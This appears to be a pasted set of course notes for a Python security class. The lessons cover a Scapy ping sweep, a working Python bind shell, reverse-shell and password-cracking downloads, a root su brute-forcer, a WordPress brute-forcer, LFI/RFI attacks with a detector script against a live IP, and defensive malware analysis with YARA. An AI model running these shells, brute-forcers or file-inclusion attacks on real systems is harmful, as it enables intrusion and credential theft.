- u.dport = 4444
- u.display()
- Execute this command to send the packet to the Windows machine:
- send(i/u/"YOUR NAME SENT VIA UDP\n")
- On the Windows target, you should see the message appear
- #######################################
- # Lesson 25: Ping Sweeping with Scapy #
- #######################################
- #!/usr/bin/python
- from scapy.all import *
- TIMEOUT = 2
- conf.verb = 0
- for ip in range(0, 256):
- packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
- reply = sr1(packet, timeout=TIMEOUT)
- if not (reply is None):
- print reply.dst, "is online"
- else:
- print "Timeout waiting for %s" % packet[IP].dst
- ###############################################
- # Checking out some scapy based port scanners #
- ###############################################
- wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
- cat rdp_scan.py
- sudo python rdp_scan.py 10.10.30.250
- ######################################
- # Dealing with conf.verb=0 NameError #
- ######################################
- conf.verb = 0
- NameError: name 'conf' is not defined
- Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
- from scapy import *
- to
- from scapy.all import *
- Reference:
- http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
- conf.verb=0 is a verbosity setting (configuration/verbosity = conv
- Here are some good Scapy references:
- http://www.secdev.org/projects/scapy/doc/index.html
- http://resources.infosecinstitute.com/port-scanning-using-scapy/
- http://www.hackerzvoice.net/ouah/blackmagic.txt
- http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
- ######################################
- # Lesson 26: Bind and Reverse Shells #
- ######################################
- vi simplebindshell.py
- #!/bin/python
- import os,sys,socket
- ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
- print '-Creating socket..'
- port = 31337
- try:
- ls.bind(('', port))
- print '-Binding the port on '
- ls.listen(1)
- print '-Listening, '
- (conn, addr) = ls.accept()
- print '-Waiting for connection...'
- cli= conn.fileno()
- print '-Redirecting shell...'
- os.dup2(cli, 0)
- print 'In, '
- os.dup2(cli, 1)
- print 'Out, '
- os.dup2(cli, 2)
- print 'Err'
- print 'Done!'
- arg0='/bin/sh'
- arg1='-a'
- args=[arg0]+[arg1]
- os.execv(arg0, args)
- except(socket.error):
- print 'fail\n'
- conn.close()
- sys.exit(1)
- nc TARGETIP 31337
- ---------------------
- Preparing the target for a reverse shell
- $ ncat -lvp 4444
- --open another terminal--
- wget https://www.trustedsec.com/files/simple_py_shell.py
- vi simple_py_shell.py
- -------------------------------
- Tricky shells
- Reference:
- http://securityweekly.com/2011/10/python-one-line-shell-code.html
- http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
- #############################
- # Reference Videos To Watch #
- #############################
- Here is your third set of youtube videos that I'd like for you to watch:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)
- #################################################
- # Lesson 27: Python Functions & String Handling #
- #################################################
- Python can make use of functions:
- http://www.tutorialspoint.com/python/python_functions.htm
- Python can interact with the 'crypt' function used to create Unix passwords:
- http://docs.python.org/2/library/crypt.html
- Tonight we will see a lot of the split() method so be sure to keep the following references close by:
- http://www.tutorialspoint.com/python/string_split.htm
- Tonight we will see a lot of slicing so be sure to keep the following references close by:
- http://techearth.net/python/index.php5?title=Python:Basics:Slices
- ################################
- # Lesson 28: Password Cracking #
- ################################
- wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py
- vi htcrack.py
- vi list.txt
- hello
- goodbye
- red
- blue
- yourname
- tim
- bob
- htpasswd -nd yourname
- - enter yourname as the password
- python htcrack.py joe:7XsJIbCFzqg/o list.txt
- sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
- rm -rf mechanize-0.2.5.tar.gz
- sudo /bin/bash
- passwd
- ***set root password***
- vi rootbrute.py
- #!/usr/bin/env python
- import sys
- try:
- import pexpect
- except(ImportError):
- print "\nYou need the pexpect module."
- print "http://www.noah.org/wiki/Pexpect\n"
- sys.exit(1)
- #Change this if needed.
- # LOGIN_ERROR = 'su: incorrect password'
- LOGIN_ERROR = "su: Authentication failure"
- def brute(word):
- print "Trying:",word
- child = pexpect.spawn('/bin/su')
- child.expect('Password: ')
- child.sendline(word)
- i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
- if i == 1:
- print "Incorrect Password"
- if i == 2:
- print "\n\t[!] Root Password:" ,word
- child.sendline ('id')
- print child.before
- child.interact()
- if len(sys.argv) != 2:
- print "\nUsage : ./rootbrute.py <wordlist>"
- print "Eg: ./rootbrute.py words.txt\n"
- sys.exit(1)
- try:
- words = open(sys.argv[1], "r").readlines()
- except(IOError):
- print "\nError: Check your wordlist path\n"
- sys.exit(1)
- print "\n[+] Loaded:",len(words),"words"
- print "[+] BruteForcing...\n"
- for word in words:
- brute(word.replace("\n",""))
- References you might find helpful:
- http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
- wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py
- vi md5crack.py
- Why use hexdigest
- http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
- http://md5online.net/
- wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py
- #############################
- # Reference Videos To Watch #
- #############################
- Here is your forth set of youtube videos that I'd like for you to watch:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)
- ######################
- # Lesson 29: Web App #
- ######################
- vi wpbruteforcer.py
- python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt
- - Here is an example of an LFI
- - Open this page in Firefox:
- http://54.186.248.116/showfile.php?filename=contactus.txt
- - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
- - Here you see a direct reference to a file on the local filesystem of the victim machine.
- - You can attack this by doing the following:
- http://54.186.248.116/showfile.php?filename=/etc/passwd
- - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
- - somewhere else on the Internet. Here is an example of a text file on the web:
- http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
- - Now we can attack the target via RFI like this:
- http://54.186.248.116/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
- - Now let's see if we can write some code to do this for us:
- vi LFI-RFI.py
- #!/usr/bin/env python
- print "\n### PHP LFI/RFI Detector ###"
- print "### Sean Arries 09/18/09 ###\n"
- import urllib2,re,sys
- TARGET = "http://54.186.248.116/showfile.php?filename=contactus.txt"
- RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
- TravLimit = 12
- print "==> Testing for LFI vulns.."
- TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
- for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
- TARGET += "../"
- try:
- source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
- except urllib2.URLError, e:
- print "$$$ We had an Error:",e
- sys.exit(0)
- if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
- print "!! ==> LFI Found:",TARGET+"etc/passwd"
- break ## BREAK LOOP WHEN VULN FOUND
- print "\n==> Testing for RFI vulns.."
- TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
- try:
- source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
- except urllib2.URLError, e:
- print "$$$ We had an Error:",e
- sys.exit(0)
- if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE
- print "!! => RFI Found:",TARGET
- print "\nScan Complete\n" ## DONE
- ###############################
- # Lesson 30: Malware Analysis #
- ###############################
- This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
- wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
- wget http://www.beenuarora.com/code/analyse_malware.py
- unzip malware-password-is-infected.zip
- infected
- file malware.exe
- mv malware.exe malware.pdf
- file malware.pdf
- mv malware.pdf malware.exe
- hexdump -n 2 -C malware.exe
- ***What is '4d 5a' or 'MZ'***
- Reference: http://www.garykessler.net/library/file_sigs.html
- objdump -x malware.exe
- strings malware.exe
- strings --all malware.exe | head -n 6
- strings malware.exe | grep -i dll
- strings malware.exe | grep -i library
- strings malware.exe | grep -i reg
- strings malware.exe | grep -i hkey
- strings malware.exe | grep -i hku
- - We didn't see anything like HKLM, HKCU or other registry type stuff
- strings malware.exe | grep -i irc
- strings malware.exe | grep -i join
- strings malware.exe | grep -i admin
- strings malware.exe | grep -i list
- - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
- sudo apt-get install -y python-pefile
- vi analyse_malware.py
- python analyse_malware.py malware.exe
- Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
- http://derekmorton.name/files/malware_12-14-12.sql.bz2
- Malware Repositories:
- http://malshare.com/index.php
- http://www.malwareblacklist.com/
- http://www.virusign.com/
- http://virusshare.com/
- http://www.tekdefense.com/downloads/malware-samples/
- ##########################################
- # Lesson 31: Creating a Malware Database #
- ##########################################
- Creating a malware database (sqlite)
- ------------------------------------
- wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
- wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
- unzip malware-password-is-infected.zip
- infected
- python avsubmit.py --init
- python avsubmit.py -f malware.exe -e
- Creating a malware database (mysql)
- -----------------------------------
- Step 1: Installing MySQL database
- Run the following command in the terminal:
- sudo apt-get install mysql-server
- Step 2: Installing Python MySQLdb module
- Run the following command in the terminal:
- sudo apt-get build-dep python-mysqldb
- sudo apt-get install python-mysqldb
- Step 3: Logging in
- Run the following command in the terminal:
- mysql -u root -p (set a password of 'malware')
- Then create one database by running following command:
- create database malware;
- wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
- vi mal_to_db.py -i (fill in database connection information)
- python mal_to_db.py -i
- python mal_to_db.py -i -f malware.exe -u
- mysql -u root -p
- malware
- mysql> use malware;
- select id,md5,sha1,sha256,time FROM files;
- mysql> quit;
- ##############################
- # Lesson 32: Setting up Yara #
- ##############################
- sudo apt-get install clamav clamav-freshclam
- sudo freshclam
- sudo Clamscan
- sudo apt-get install libpcre3 libpcre3-dev
- wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz
- wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz
- tar -zxvf v3.1.0.tar.gz
- cd yara-3.1.0/
- ./bootstrap.sh
- ./configure
- make
- make check
- sudo make install
- cd yara-python/
- python setup.py build
- sudo python setup.py install
- cd ..
- yara -v
- wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py
- sigtool -u /var/lib/clamav/main.cvd
- python clamav_to_yara.py -f main.ndb -o clamav.yara
- wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
- unzip malware-password-is-infected.zip
- infected
- mkdir malcode/
- mv malware.exe malcode/
- vi testrule.yara
- ----------------
- rule IsPE
- {
- meta:
- description = "Windows executable file"
- condition:
- // MZ signature at offset 0 and ...
- uint16(0) == 0x5A4D and
- // ... PE signature at offset stored in MZ header at 0x3C
- uint32(uint32(0x3C)) == 0x00004550
- }
- rule has_no_DEP
- {
- meta:
- description = "DEP is not enabled"
- condition:
- IsPE and
- uint16(uint32(0x3C)+0x5E) & 0x00100 == 0
- }
- rule has_no_ASLR
- {
- meta:
- description = "ASLR is not enabled"
- condition:
- IsPE and
- uint16(uint32(0x3C)+0x5E) & 0x0040 == 0
- }
- ----------------
- yara testrule.yara malcode/malware.exe
- mkdir rules/
- cd rules/
- wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara
- wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara
- wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara
- cd ..
- yara rules/ malcode/malware.exe
- wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zip
- unzip master.zip
- cd YaraGenerator-master/
- python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe"
- cat Test-Rule-2.yar
- wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
- yara Test-Rule-2.yar putty.exe
- ####################
- # Additional Tasks #
- ####################
- - PE Scanner:
- https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.py
- http://www.beenuarora.com/code/analyse_malware.py
- - AV submission:
- http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
- https://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py
- - Malware Database Creation:
- https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement